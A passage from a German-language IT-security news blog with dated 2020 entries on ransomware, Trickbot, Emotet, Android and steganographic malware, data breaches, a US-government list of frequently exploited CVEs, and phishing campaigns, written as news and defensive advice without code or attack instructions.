Gemäss den Sicherheitsexperten von Unit 42 ist diese Methode über den MBR eher unüblich. Das jüngste nennenswerte Beispiel war die Ransomware Petya im Jahr 2017.

Der Versuch scheitert

Die neue Variante von Thanos versucht den MBR zu überschreiben, um eine Lösegeldforderung darzustellen. Der Code, der dafür verantwortlich ist, den MBR zu überschreiben, verursacht allerdings einen Ausnahmefehler. Der Grund dafür sind ungültige Zeichen in der Lösegeldforderung. 

Der MBR bleibt daher auch nach der Infektion des Rechners noch intakt. Thanos versagt – zumindest in der aktuellen Iteration – darin, den PC auf BIOS-Ebene zu sperren und das System kann weiterhin korrekt starten.

So wirklich erfreulich sind diese Neuigkeiten jedoch nicht. Schliesslich wurden die Rechner – wenn auch auf dem konventionellen Weg – dennoch verschlüsselt. Ob die Opfer das geforderte Lösegeld, 20'000 US-Dollar, zahlten, weiss Unit 42 nach eigenen Angaben nicht. Und zudem könnte dieser Patzer in der Programmierung in der nächsten Version von Thanos bereits behoben sein. 

07.09.2020 - 13:22 Uhr

Trickbot und Co. machen Jagd auf Tuxli

Der Windows-Schädling Trickbot hat neuerdings auch Linux-Systeme im Visier. Trickbot ist eine äusserst vielseitige Malware-Plattform, die sich für verschiedene finstere Zwecke eignet – darunter auch das Stehlen von Informationen und Zugangsdaten. Das Schadprogramm zeichnet sich vor allem dadurch aus, dass es sich konstant und im hohen Tempo weiterentwickelt und neue Tricks lernt. Der jüngste Trick: Die Windows-Malware kann sich nun auf Linux-Systemen einnisten. Dies ermöglicht es den Angreifern, verdeckt auf Windows-Geräte im selben Netzwerk zuzugreifen.

Das eröffnet Hackern einen neuen Angriffsvektor: Sie können Server in einer Unix-Umgebung attackieren und anschliessend von dort aus das gesamte Firmennetzwerk übernehmen. Was es den Hackern noch einfacher macht: Auch viele IoT-Geräte wie etwa Router oder NAS nutzen Linux und sind somit ein potenzielles Einfallstor für Trickbot. 

Die Malware Trickbot ist nicht das einzige Cyberrisiko, das Linux-Nutzer im Auge behalten sollten. Trend Micro warnt derzeit vor einer neuen Malware namens Ensiko. Diese könne Dateien auf jedem System infizieren, auf dem PHP läuft. Folglich könne Ensiko für Ransomware-Attacken auf Windows- und MacOS-Geräten sowie auf Linux-Web-Server genutzt werden. Der Schädling verschlüsselt die Dateien in einer Web-Shell-Directory und hängt die Erweiterung .bak an die verarbeiteten Dateien.

28.08.2020 - 10:22 Uhr

Fast jede zweite Führungskraft auf C-Ebene von Spyware betroffen

Wer eine höhere Position in einem Unternehmen hat, ist wohl auch schneller das Ziel von Cyberkriminellen. Mit der höheren Position kommen auch mehr Freiheiten, was das Problem zusätzlich verschärft, wie eine Studie von Atlas VPN zeigt. Demzufolge wurden 2019 rund 46 Prozent aller Führungskräfte auf C-Ebene (also CEOs, COOs, CFOs und so weiter) Opfer eines Spyware-Angriffs. Mit derartigen Schadprogrammen verschaffen sich Cyberkriminelle Zugriff auf die Rechner ihrer Opfer. Diese bemerken den Eindringling oftmals gar nicht. Wie der Name schon vermuten lässt, können Angreifer mit Spyware Informationen über und vom infizierten Rechner sammeln und so auch vertrauliche Daten stehlen. 

 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Ein Beitrag geteilt von IT-Security Blog (by IT-Markt) (@itsecurityblog) am

 

Ausser Spyware leiden Führungskräfte laut dem Unternehmen auch stark unter anderen Formen von Cyberattacken. Bei einem Anteil von 54 Prozent der Befragten sind Phishing-Angriffe sogar noch zahlreicher als Spyware. 36 Prozent der Befragten wurden im vergangenen Jahr Opfer einer Ransomware und 20 Prozent Opfer einer DDoS-Attacke. 12 Prozent der Führungskräfte sahen sich zudem mit Credential-Stuffing-Attacken konfrontiert. Dabei werden gestohlene Zugangsdaten genutzt, um unbefugten Zugriff auf Benutzerkonten zu erlangen.

C-Level-Führungskräfte würden oft die im Unternehmen geltenden Sicherheitsvorschriften umgehen, schreibt das Unternehmen in der Studie. Mehr als drei Viertel der für eine ältere Studie befragten Führungskräfte hätten zugegeben, gewisse Sicherheitsprotokolle zu deaktivieren, um Aufgaben in kürzerer Zeit erledigen zu können. Daher, so kommt Atlas VPN zum Schluss, sei diese Gruppe am anfälligsten für Spyware- und andere Arten von Cyberattacken. Eine Rechnung, die sich nicht lohne: Denn eine Arbeitsstunde zu sparen, könnte später tausende US-Dollar kosten, schreibt das Unternehmen.

21.08.2020 - 12:42 Uhr

Wenn Hacker Hacker hacken, mobilisieren sie Memes statt Malware

Die Betreiber hinter der Malware Emotet und dem daraus resultierenden, gleichnamigen Botnet sind wohl selbst Opfer von Hackern geworden. Emotet, ursprünglich ein Banking-Trojaner, wird heute genutzt, um Rechner zu infiltrieren, weitere Malware darauf zu installieren und die gehackten Maschinen zu einem Botnet zu verknüpfen. Für die Infektion setzt Emotet auf Spam-Kampagnen und kompromittierte Websites, auf denen die schädliche Nutzlast gespeichert wird. Klickt ein Nutzer auf den Anhang in einer Spam-Nachricht, laden die darin enthaltenen Macros die Nutzlast von den Websites herunter. 

(Source: Bleepingcomputer.com auf Vimeo)

Derzeit verteilen diese Websites jedoch keine Malware, sondern Memes und GIFs, wie Bleepingcomputer.com berichtet. Unbekannte erlangten die Kontrolle über das Netzwerk und tauschten die Inhalte aus. Gemäss dem Cybersecurity-Forscher Kevin Beaumont verteilen rund ein Viertel der Websites, die er überprüfte, Memes statt Malware. Ausserdem gehe der unbekannte Hacker sehr schnell vor: Bei bestimmten Websites ersetzte er die Malware in weniger als zwei Minuten nach dem Aufschalten mit einem GIF.

Es ist zwar nicht klar, ob es sich bei dem Unbekannten um einen wohlmeinenden Samariter oder einen Rivalen handelt, der das Emotet-Botnet lahmlegen will. Für die Opfer bedeutet dies so oder so eine Verschnaufpause. Schliesslich resultiert ein falscher Klick mit etwas Glück nicht mehr in eine Infektion, sondern in ein Schmunzeln.

25.05.2020 - 11:14 Uhr

Mehrstufige Malware Mandrake mag mannigfaltige Maskeraden

Um Virenscannern zu entgehen, lassen sich Schadprogramme immer neue Tricks einfallen. Die Malware Mandrake war, was dies betrifft, besonders erfolgreich. Sie war vier Jahre lang im Google Play Store aktiv, bevor sie dem rumänischen IT-Security-Anbieter Bitdefender ins Netz ging.

Um unentdeckt zu bleiben, setzt Mandrake auf eine mehrstufige Infektion. Die erste Stufe ist ein scheinbar unscheinbarer Dropper – getarnt als eine legitime App im Play Store. Die Malware nutzt verschiedene Maskeraden und gibt sich unter anderem als Coinbase, Amazon, Google Mail, Google Chrome, der Währungsrechner XE, sowie verschiedene Banken und Paypal aus.

Bereits der Dropper (die erste von 3 Stufen) schnüffelt auf dem Smartphone herum. Gemäss Bitdefender könnten die Operatoren hinter der Malware in diesem Stadium bereits aus der Ferne das WLAN aktivieren, Geräteinformationen sammeln, Benachrichtigungen ausblendeten und neue Apps installierten. Mit einem Captcha kann sie zudem prüfen, ob sie sich in einer Testumgebung oder auf einem echten Smartphone befindet.

Nach einer gewissen Zeitspanne lädt der Dropper die zweite Komponente der Malware herunter: den Loader. Dieser ist dafür zuständig, die eigentliche Mandrake-Schadsoftware auf dem Gerät zu installieren. 

Ist die Infektion komplett, hat der Angreifer volle Admin-Rechte auf dem Gerät. So kann er etwa Nachrichten verschicken und Anrufe tätigen, den GPS-Standort sowie den Bildschirm aufzeichnen und Zugangsdaten stehlen. Zudem kann die Malware das Handy auch auf Werkseinstellungen zurücksetzen und so sämtliche Spuren einer Infektion eliminieren. 

Bitdefender geht davon aus, dass die Attacken nicht automatisiert, sondern von Menschen gezielt ausgeführt wurden, wie „The Register“ berichtet. Das Unternehmen schätzt die Anzahl Opfer im Bereich mehrerer Zehntausend Personen. Die Drahtzieher seien möglicherweise in Russland oder Kasachstan.
 

25.05.2020 - 11:10 Uhr

Trickbot nutzt Corona-Panik für finstere Machenschaften aus

Situationen genereller Unsicherheit sind für Cyberkriminelle immer ein gefundenes Fressen. So auch die Covid-19-Pandemie. Zu den aktivsten Malware-Akteuren, die das Coronavirus für ihre Zwecke ausnutzen, gehört Trickbot. Dies zeigt eine Auswertung von Microsoft. Das Schadprogramm wird durch E-Mails verbreitet, die etwa vorgeben, Informationen zum Virus zu enthalten. 

In einer aktuellen E-Mail-Kampagne ködern Cyberkriminelle etwa mit kostenlosen Covid-19-Tests. Um das Virus zu verbreiten, setzen die Kriminellen gemäss Microsoft mehrere hundert einzigartige Dokumente mit Makros ein. Klickt ein Opfer auf den E-Mail-Anhang, infiziert er sich mit der Trickbot-Malware, sobald er die Makros aktiviert. 

Trickbot zeichnet sich vor allem dadurch aus, dass es kontinuierlich weiterentwickelt wird. Mittlerweile ist die Malware deutlich über ihre ursprüngliche Programmierung als E-Banking-Trojaner hinausgewachsen und bietet unter anderem auch Access-as-a-Service an (Mehr dazu im Eintrag vom 28. November 2019: "Trojaner Trickbot testet taufrische Tricks").

Auch das Schweizer Government Computer Emergency Response Team (GovCERT) warnt vor Cyberkriminellen, welche die Pandemie ausnutzen. Betrüger verschickten E-Mails mit der Drohung, den Empfänger mit dem Coronavirus zu infizieren. Das GovCERT rät, diese E-Mails zu ignorieren. 

25.05.2020 - 11:10 Uhr

Easyjet-Hack macht Kunden zu einfachen Opfern für Cyberkriminelle

Die Billigfluglinie Easyjet ist Opfer einer Cyberattacke geworden. Die Angreifer stahlen E-Mail-Adressen und Reiseinformationen. Rund 9 Millionen Kunden sind betroffen, wie die britische Fluggesellschaft auf seiner Website mitteilt. Von 2208 weiteren Kunden wurden zudem noch Kreditkarteninformationen entwendet – inklusive der CVV-Nummer. 

Die Fluglinie beschreibt den Angriff als einen „äusserst fortgeschrittenen Cyberangriff“. Mehr teilte das Unternehmen dazu nicht mit. Der Angriff wird nun von der Datenschutzbehörde des Vereinigten Königreichs (dem Information Commissioner's Office - ICO) untersucht. 

Anderes Ziel im Visier

Gemäss einem Bericht der BBC deuten erste Untersuchungsergebnisse darauf hin, dass Die Hacker es eigentlich auf geistiges Eigentum von Easyjet abgesehen hatten und nicht auf Informationen, die für Identitätsdiebstahl verwendet werden könnten.

Ferner berichtet BBC, dass Easyjet bereits im Januar von der Attacke erfahren hat. Es habe aber bis jetzt gedauert, das volle Ausmass des Angriffs zu verstehen und die betroffenen Kunden zu identifizieren, zitiert der Bericht einen Mediensprecher. Das Unternehmen will alle Betroffenen bis zum 26. Mai informieren.

Nicht nur die Kreditkartendetails, auch die gestohlenen Informationen der 9 Millionen Kunden könnten von Cyberkriminellen nun als Angriffsvektor ausgenutzt werden. So könnten sie die E-Mail-Adressen und Reiseinformationen etwa für zielgerichtete Phishing-Angriffe verwenden. Easyjet-Kunden sollten daher künftig ein waches Auge auf E-Mails haben, die vermeintlich von der Fluggesellschaft kommen. 

Millionenstrafe mit bösem Timing

Die Cyberattacke kommt für Easyjet zu einem denkbar schlechten Zeitpunkt. Mit aller Wahrscheinlichkeit leidet das Unternehmen ohnehin bereits unter der Coronakrise und den damit verbundenen Reisebeschränkungen. 

Dieser Datenverlust könnte zusätzlich zu einer hohen Busse führen. Dies war etwa auch beim Hackerangriff auf den Marktbegleiter British Airways in 2018 der Fall. Damals wurden die Daten von mehr als einer halben Million Kunden entwendet. Die ICO verhängte später eine Strafe von 183 Millionen Pfund – die deutlich höheren Entschädigungszahlungen für die betroffenen Kunden sind darin nicht enthalten (Mehr dazu im Beitrag "British Airways wollte IT-Security an IBM outsourcen – und wurde zuvor prompt gehackt" vom 11. September 2018).

Wird Easyjet gemäss der EU-DSGVO gebüsst, droht eine Strafe von bis zu 4 Prozent des jährlichen Umsatzes. 2019 lag der Jahresumsatz bei knapp 6,4 Milliarden Pfund – was eine Geldstrafe von über 250 Millionen Pfund zur Folge hätte.
 

14.05.2020 - 11:40 Uhr

Zeit zum Patchen: die 10 gefährlichsten Sicherheitslücken gemäss FBI, CISA und Co.

Das Ministerium für Innere Sicherheit der Vereinigten Staaten hat eine Liste mit den 10 am häufigsten ausgenutzten IT-Schwachstellen veröffentlicht. Die Liste stellten das Federal Bureau of Investigation (FBI), die Cybersecurity and Infrastructure Security Agency (CISA) und weitere Organisationen der US-amerikanischen Regierung zusammen.

Die Liste ist für IT-Security-Verantwortliche gedacht, damit sie ihre Unternehmen absichern können. Sie informiert nicht nur über die Schwachstellen, sondern auch über mögliche Anzeichen einer Kompromittierung (Indicators of compromise - IOC) sowie Anleitungen, wie die Schwachstellen zu beheben sind. 

Die 10 am häufigsten ausgenutzten Schwachstellen zwischen 2016 und 2019

  1. CVE-2017-11882: Eine "Microsoft Office Memory Corruption Vulnerability", die es einem Angreifer ermöglicht, beliebigen Code im Kontext des Benutzers auszuführen. 
  2. CVE-2017-0199:  Eine "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API", die es dem Angreifer erlaubt, beliebigen Code über ein präpariertes Dokument auszuführen.
  3. CVE-2017-5638: Eine Schwachstelle in Apache Struts verursacht eine fehlerhafte Ausnahmebehandlung bei Error-Meldungen während versuchten Datei-Uploads. Angreifer können durch manipulierte HTTP-Header beliebige Befehle ausführen.
  4. CVE-2012-0158: Eine Schwachstelle in MSCOMCTL.OCX, die es Angreifern ermöglicht, über eine präparierte Website, Office-Dokumente oder .rtf-Dateien beliebigen Code auszuführen, die eine "System State"-Korruption auslöst.
  5. CVE-2019-0604: Eine "Microsoft SharePoint Remote Code Execution Vulnerability". Die Software scheitert daran, das Quellcode-Mark-up eines Anwendungspakets zu überprüfen.
  6. CVE-2017-0143: Eine "Windows SMB Remote Code Execution Vulnerability", aufgrund derer die Angreifer mittels manipulierter Packets aus der Ferne beliebigen Code ausführen können.
  7. CVE-2018-4878: Eine Schwachstelle im Adobe Flash Player aufgrund eines hängenden Zeigers im Primetime SDK. Ein erfolgreicher Angriff kann zur Ausführung von beliebigem Code führen. 
  8. CVE-2017-8759: Eine ".NET Framework Remote Code Execution Vulnerability". Mittels manipulierten Dokumenten oder Applikationen können Angreifer Befehle aus der Ferne ausführen.
  9. CVE-2015-1641: Eine sogenannte "Microsoft Office Memory Corruption Vulnerability". Mit einer präparierten .rtf-Datei können Angreifer beliebigen Code ausführen. 
  10. CVE-2018-7600: Eine Schwachstelle in Drupal aufgrund eines Problems, das mehrere Subsysteme mit Standard- oder gemeinsamen Modulkonfigurationen betrifft. Ein Angreifer kann beliebigen Code ausführen, wenn er sie ausnutzt.

Bereits seit 2015 in den Top 10

Gemäss einer Auswertung der US-Regierung, werden insbesondere Schwachstellen in Microsofts "Object Linking and Embedding"-Technologie häufig ausgenutzt. Durch die Technologie könnten Dokumente eingebettete Inhalte aus anderen Anwendungen enthalten. 

CVE-2017-11882, CVE-2017-0199 und CVE-2012-0158 etwa stehen alle im Zusammenhang mit der "Object Linking and Embedding"-Technologie. Dabei handelt es sich gemäss der Mitteilung um die drei Schwachstellen, die am häufigsten von chinesischen, iranischen, nordkoreanischen und russischen Akteuren ausgenutzt werden.

Die Liste zeigt auch, dass Unternehmen ihre IT-Systeme oftmals nicht oder nicht richtig aktualisieren. Die Schwachstelle CVE-2012-0158 beispielsweise war bereits 2015 auf der Liste der am häufigsten ausgenutzten Schwachstellen der US-amerikanischen Regierung. 

Der Grund für das zögerliche Patch-Verhalten liege wohl in der inhärenten Gratwanderung: Ein Patch ist für IT-Security-Verantwortliche immer ein Abwägen zwischen der Notwendigkeit, die Systeme abzusichern und der Notwendigkeit, die Systeme am Laufen zu halten. Insbesondere wenn es um mehrere Sicherheitslücken geht, ist die Behebung mit einem erheblichen Aufwand verbunden. 

Der Faktor Mensch

Die Liste informiert zudem über gewisse weiterer Schwachstellen, die aktuell ausgenutzt werden. CVE-2019-19781, ein Problem im Citrix Application Delivery Controller (ADC) und Gateway sowie CVE-2019-11510, eine Schwachstelle in Pulse Secure Pulse Connect Secure (PCS) 8.2.

Zudem warnen CISA, FBI und Co. in der Mitteilung vor hastig implementierten Office-365-Umgebungen. Diese häufen sich aufgrund der Coronakrise. Eine weitere wichtige Schwachstelle, für die es jedoch keinen Patch gibt, ist der Faktor Mensch. Ungenügend sensibilisierte Mitarbeiter seien etwa ein Einfallstor für Ransomware-Angriffe. 

Wie man seine Angestellten schützen kann, auch wenn diese von zuhause aus arbeiten, lesen Sie hier im Podium zum Thema Security im Homeoffice. Mit Tipps der Experten von All for One, Check Point, Ensec, Eset, G Data, der GKB, Ispin, Melani, den SBB und Terreactive.

05.05.2020 - 11:35 Uhr

Xiaomi weiss, was die Nutzer im Inkognitomodus suchen

Die US-amerikanische Zeitschrift "Forbes" erhebt in einem Bericht schwere Vorwürfe gegen den chinesischen Hersteller Xiaomi. Dessen Handys seien im Wesentlichen "Backdoors mit Telefonie-Funktionen". Der Bericht beruft sich auf Aussagen der beiden Cybersecurity-Experten Gabi Cirlig und Andrew Tierney.

Cirlig sei aufgefallen, dass sein Redmi Note 8 sein Nutzungsverhalten auf dem Smartphone verfolgt und an Server in Singapur und Russland schickt. So sammle der Standard-Xiaomi-Browser unter anderem die URLs besuchter Websites, Suchanfragen über Google und Duckduckgo, gelesene News-Beiträge über die News-App – auch wenn der Nutzer den Inkognitomodus benutzte. Auch die im Google Playstore erhältliche Version des Browsers bespitzle die Nutzer.  

Das Gerät wollte aber noch mehr wissen. Gemäss dem Bericht sammelte es auch Informationen darüber, welche Dateiordner geöffnet wurden, Seriennummern, mit denen sich das spezifische Gerät identifizieren lässt sowie über die Version des installierten Android-OS. Auch die Musik-App von Xiaomi zeigte eine unangebrachte Neugier: Die App schickte etwa weiter, welche Lieder wann abgespielt wurden.

Datenabfluss für Benutzeranalysen

Der Bericht setzt diesen Datenabfluss mit der Firma Sensor Analytics in Verbindung. Das Unternehmen bietet Analysen und Beratungen rundum Nutzerverhalten an. Und Xiaomi gehört zu den Kunden der Firma. Laut dem Bericht senden Xiaomi-Apps die Daten an Domains, die auf Sensors Analytics zu verweisen scheinen.

Xiaomi dementiert die Befunde gegenüber Forbes. Die Behauptungen der beiden Sicherheitsforscher seien unwahr, der Schutz der Privatsphäre von höchster Bedeutung und das Unternehmen halte sich streng an lokale Gesetze und Vorschriften zum Datenschutz. 

Eine Mediensprecherin bestätigte gegenüber Forbes jedoch, dass gewisse Daten tatsächlich gesammelt wurden. Diese Informationen seien jedoch verschlüsselt, sodass man daraus nicht auf die Identität des Benutzers schliessen könne. 

Verschlüsselung innert Sekunden geknackt

Laut dem Forbes-Bericht sei es Cirlig jedoch gelungen, die Verschlüsselung innert weniger Sekunden zu knacken. Das genutzte Base64-Verfahren bot nur wenig Widerstand. "Mein Hauptanliegen ist, dass die gesendeten Daten sehr leicht mit einem bestimmten Benutzer korreliert werden können", zitiert die Zeitschrift Cirlig.

In einem Blogeintrag erklärt Xiaomi, wie und wann dessen Geräte die von Benutzern besuchten URLs sammeln. In einem kommenden Update für den Browser will der Hersteller zudem die Option einführen, das Senden von Daten zu deaktivieren. 
 

21.04.2020 - 11:23 Uhr

Cognizant gefangen im Labyrinth der Maze-Ransomware

IT-Riese Cognizant ist Opfer einer Ransomware geworden. Mit rund 300 000 Mitarbeitenden und einem jährlichen Umsatz von über 15 Milliarden US-Dollar gehört der US-amerikanische Dienstleister zu den grössten Anbietern von Managed Services weltweit. 

Das Unternehmen informierte bereits seine Kunden. Damit diese prüfen können, ob sie selbst infiziert sind, wies Cognizant auch auf mögliche Indikatoren einer Kompromittierung hin (IOC – Indicators of Compromise). Darunter IP-Adressen sowie Hashwerte für die Dateien kepstl32.dll, memes.tmp und maze.dll, wie "Bleepingcomputer" berichtet.

Sicherheitsforscher Vitali Kremez veröffentlichte eine Yara-Regel, mit der sich die Maze-DLL-Datei aufspüren lässt.

 

 

Insbesondere die letzte Datei gibt einen Hinweis darauf, wer hinter der Attacke stecken könnte: die Dateien deuten auf die Maze-Ransomware hin. Cognizant bestätigt dies auch selbst in einer Mitteilung. Die Maze-Betreiber verneinten gegenüber "Bleepingcomputer" jedoch, dafür verantwortlich zu sein. Allerdings sei es für diese Cyberkriminellen nicht ungewöhnlich, aktuelle Infektionen nicht zu besprechen, solange sie noch darauf hoffen, ein Lösegeld zu erhalten. 

Sollte tatsächlich die Maze-Gruppe dafür verantwortlich sein, muss diese Cyberattacke auch als Datenleck behandelt werden. Die Cyberkriminellen entwenden nämlich immer Dateien, bevor sie durch die Ransomware verschlüsselt werden – als weiteres Druckmittel für ihre Lösegeldforderung. Gemäss dem Bericht sind dies auch keine leeren Drohungen: Die Gruppe betreibt – wie andere Ransomware-Operatoren ebenfalls – eine Website, um gestohlene Informationen zu publizieren.  

 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Ein Beitrag geteilt von IT-Security Blog (by IT-Markt) (@itsecurityblog) am

 

15.04.2020 - 12:12 Uhr

Cyberkriminelle treffen Boeing, Lockheed Martin und SpaceX durch die Hintertür

Einen digitalen Schutzwall um sich aufbauen, genügt heute nicht mehr. Denn Cyberbedrohungen kommen längst nicht mehr nur von aussen. Einige haben es nicht mal direkt auf ein Unternehmen abgesehen, sondern treffen dieses über seine Lieferkette.

Solche Supply-Chain-Attacken zielen stattdessen auf kleinere Zulieferer ab. Denn diese werden von Cyberkriminellen als schwächere, einfachere Ziele angesehen. Manchmal sind die grossen Firmen das eigentliche Ziel, manchmal sind sie auch nur Kollateralschaden. So oder so haben sie aber den Schaden.

Wie jetzt etwa Boeing, Lockheed Martin und SpaceX, wie The Register berichtet. Die Cyberkriminellen hinter der Doppelpaymer-Ransomware veröffentlichten interne Dokumente der genannten Firmen online. Diese enthalten etwa die Spezifikationen einer Antenne in einem von Lockheed Martin entwickelten Mörserabwehrsystem sowie Details zu weiterer militärischer Ausrüstung.  

Ferner tauchten auch Rechnungs- und Zahlungsformulare, Lieferanteninformationen, Datenanalyseberichte und juristische Unterlagen auf, sowie Dokumente, welche das Partnerprogramm für Fertigungspartner von SpaceX beschreiben.
 
Auftragnehmer zahlte Lösegeldforderung nicht 

Wie kamen die Dokumente in die Händer der Cyberkriminellen? Sie hatten die US-amerikanische Firma Visser Precision mit der Doppelpaymer-Ransomware lahmgelegt. Visser Precision ist ein Auftragnehmer für Fertigung und Konstruktion im Rüstungsbereich, in der Automobilindustrie sowie in der Luft- und Raumfahrt.

Die Ransomware verschlüsselt sämtliche Daten auf Windows-Systemen. Wer seine Daten zurückhaben will, muss ein hohes Lösegeld zahlen. Gemäss The Register verlangen die Kriminellen hinter dieser Ransomware teilweise Millionenbeträge. Als Visser Precision nicht zahlte, publizierten die Kriminellen die Dokumente online. Zu diesem Zweck betreiben die Cyberkriminellen sogar eine eigene Website, auf der sie regelmässig Dokumente nicht zahlender Opfer publizieren.

Der Fall wirft die Frage auf, wie Firmen auf Lösegeldforderungen reagieren sollen. Zahlen oder nicht? Wer zahlt, bekräftigt die Erpresser lediglich in ihrem Businessmodell. Aber es ist sehr viel einfacher zu sagen, man zahlt nicht, wenn die eigenen Firmengeheimnisse nicht auf dem Spiel stehen. 

 

15.04.2020 - 11:46 Uhr

Das Internet der Dinge wird zunehmend unsicherer

Die Sicherheitslage im Internet der Dinge (IoT) hat sich 2019 im Vergleich zum Vorjahr verschlechtert. Zu diesem Schluss kommt der «IoT Threat Report 2020» von Unit 42 – das Aufklärungsteam für Cybersecurity-Bedrohungen von Palo Alto Networks. 

Fast der komplette Datenverkehr (98 Prozent) zwischen den untersuchten IoT-Geräten geschah unverschlüsselt. Das heisst, dass unter Umständen auch persönliche und vertrauliche Daten in den Netzwerken offengelegt wurden. Zudem seien 57 Prozent der IoT-Geräte anfällig für "Angriffe mittlerer und hoher Schwere". 

Ein mangelhaftes Patch-Verhalten verschärfe die Lage zudem noch. Dies mache das IoT zur "niedrig hängenden Frucht" – einem einfachen Ziel für Cyberkriminelle. Die häufigsten Angriffe erfolgen daher auch über seit Langem bekannte Schwachstellen oder über Passwortangriffe mit Standard-Gerätepasswörtern.

Im Gesundheitswesen sei zudem auch der Bereich der Netzwerkhygiene mangelhaft. 72 Prozent der untersuchten Einrichtungen würden IoT- und IT-Ressourcen mischen. So könnte Malware etwa von einem infizierten Laptop zu medizinischen Bildgebungsgeräten springen.

Für den Bericht untersuchte Unit 42 nach eigenen Angaben 1,2 Millionen IoT-Geräte an tausenden physischen Standorten von Unternehmen und Gesundheitseinrichtungen in den USA.
 

27.03.2020 - 17:56 Uhr

Homeoffice reisst 8000 grosse Löcher in die IT-Abwehr Schweizer Firmen

Aufgrund der aktuellen Covid-19-Epidemie haben viele Unternehmen ihre Mitarbeiter ins Homeoffice geschickt. Jedoch seien nur wenige Unternehmen voll umfänglich auf diese Lage vorbereitet gewesen, teilt Check Point mit. 

Im Bestreben, die Mitarbeiter vor dem Virus zu schützen, setzten die Unternehmen sie einer neuen und ebenfalls sehr gefährlichen Bedrohung aus. Allein in der Schweiz identifizierte der israelische Cybersecurity-Anbieter 7845 ungeschützte und somit frei zugängliche Outlook-Postfächer. Check Point beruft sich dabei auf Zahlen der Übersichtsseite Shodan.io.

Der Grund dafür sei, dass die Unternehmen die Outlook Web Application (OWA) verwenden würden. So könnten die Mitarbeiter auch mit ihren privaten Endgeräten vom Homeoffice aus darauf zugreifen – auch wenn sie nicht über eine Microsoft-Office-Lizenz verfügen. Die Web Application öffnet das Postfach im Browser, statt über das installierbare Desktop-Programm. Dies reisse jedoch ein grosses Loch in die IT-Absicherung. 

Sonja Meindl

Sonja Meindl, Country Manager Schweiz und Österreich bei Check Point. (Source: Check Point)

"Wir können nur allen Unternehmen raten, diese offenen Ports umgehend zu schliessen und auf Schutzmassnahmen erfahrener Sicherheitsanbieter als zusätzliche Abschirmung zurückzugreifen", warnt Sonja Meindl, Country Manager Schweiz und Österreich bei Check Point. "Andernfalls ist einer ihrer sensibelsten Bereiche, der gesamte E-Mail-Verkehr, frei im Internet einsehbar und damit Angreifern schutzlos ausgeliefert." 

Der DACH-Raum ist gemäss Mitteilung besonders betroffen von diesem Problem. In Deutschland liegen fast 50'000 Ports offen – lediglich in den USA waren mehr zu finden. Etwa ein Drittel aller offenen Ports in den 10 am meisten gefährdeten Ländern sind in der Schweiz, Deutschland oder Österreich.

27.03.2020 - 17:36 Uhr

Keylogger Hawkeye versteckt sich selbst in einem PNG-Bild

Das Swiss Government Computer Emergency Response Team (GovCERT) hat einem alten Keylogger einen Blogeintrag gewidmet. Das Schadprogramm, um das es hier geht, ist schon seit 2013 aktiv. Seitdem hat sich Hawkeye, wie der Schädling heisst, ständig weiterentwickelt. 

Unlängst entdeckte das GovCERT eine Hawkeye-Binärdatei, die eine interessante Verschleierungstechnik nutzt. Der Schädling versteckt eine ausführbare Datei in einem PNG-Bild. Steganographie, wie diese Verschlüsselungstechnik genannt wird, ist nichts Neues. Dennoch sei diese Probe eine Meldung wert, schreibt das GovCERT. Denn es sei eine interessante Methode, Anti-Virus-Lösungen zu umgehen. 

Die Datei – in diesem Falle ein Portable Executable im .exe-Format – werde direkt im Arbeitsspeicher ausgeführt. Hier können AV-Lösungen den Schädling nicht sehen. Die untersuchte Hawkeye-Probe speichert jedoch eine Kopie von sich selbst auf der Festplatte, die von AV-Lösungen entdeckt werden kann.

Dass diese Methode funktioniert, zeigen die Erkennungsraten auf der Virustotal-Datenbank. Die entschlüsselte PE-Datei wurde direkt nach dem Upload auf Virustotal von 34 Engines als boshaft erkannt. Aber selbst zwei Wochen nach dem Upload identifizierten lediglich 17 Engines die ursprüngliche Probe als schädlich. 

16.03.2020 - 11:19 Uhr

Cyberkriminelle nutzen Coronavirus und BAG-Logo, um Malware zu verbreiten

Das Coronavirus hat für viel Verunsicherung in der Schweizer Bevölkerung gesorgt – ein Umstand, den Cyberkriminelle nun für sich nutzen wollen. Wie die Melde- und Analysestelle Informationssicherung (Melani) mitteilt, sind seit Freitagmittag (13. März 2020) betrügerische E-Mails im Umlauf. 

Die E-Mails kommen vermeintlich vom Bundesamt für Gesundheit (BAG) – im Anhang eine Excel-Tabelle. Diese beinhalte angeblich aktuelle Zahlen der Gesundheitsbehörden zur Verbreitung von Covid-19 in der Schweiz. "Finden Sie heraus, wie viele Fälle in Ihrer Nähe gemeldet wurden", heisst es in der E-Mail. 

Malware statt Infos

Tatsächlich dienen die E-Mails jedoch nur einem Zweck: der Verbreitung von Malware. Die Cyberkriminellen wollen so Rechner mit dem Keylogger und RAT (Remote Access Trojan) Agenttesla infizieren. Dieser ermögliche den Angreifern den vollen Fernzugriff auf den Computer und zudem könne das Schadprogramm auch Passwörter auslesen, warnt Melani. 

Keylogger? RAT? Was war schon wieder was? Das IT-Security-Glossar gibt einen schnellen Überblick über die gängigsten Begriffe rund um Cybercrime und IT-Security. 

Ein Beispiel eines gefälschten E-Mails im Namen des BAG. (Source: Melani)

Ein Beispiel eines gefälschten E-Mails im Namen des BAG. (Source: Melani)

Ähnliche Fälle schon im Februar

Melani empfiehlt daher, derartige E-Mails zu ignorieren, keine Anhänge zu öffnen und auch auf keine Links zu klicken. Wer versehentlich bereits etwas angeklickt habe, solle umgehend den Computer ausschalten, ihn neu aufsetzen und falls nötig ein Fachgeschäft kontaktieren. Anschliessend solle man auch gleich alle Passwörter ändern.

Bereits im Februar hatte der britische IT-Security-Anbieter Sophos mitgeteilt, dass Cyberkriminelle Namen und Logo der Weltgesundheitsorganisation WHO für denselben Zweck missbrauchten. Lesen Sie mehr dazu im Eintrag vom 18. Februar 2020: "Dreiste Hacker infizieren mit Coronavirus auch Rechner".

 

04.03.2020 - 14:19 Uhr

Erstmals mehr Malware für Mac als für Windows

Der US-amerikanische IT-Sicherheitsanbieter Malwarebytes hat im Februar seinen "2020 State of Malware Report" veröffentlicht. Der Bericht untersucht die Cyberbedrohungslage 2019. Darin wird unter anderem auch sehr detailliert über Schädlinge berichtet, die Mac-Geräte angreifen. Einige Mac-Nutzer und auch gewisse Händler tun dies zwar gern als Ammenmärchen ab. Der Bericht von Malwarebytes zeigt jedoch ein eindeutiges Bild. 

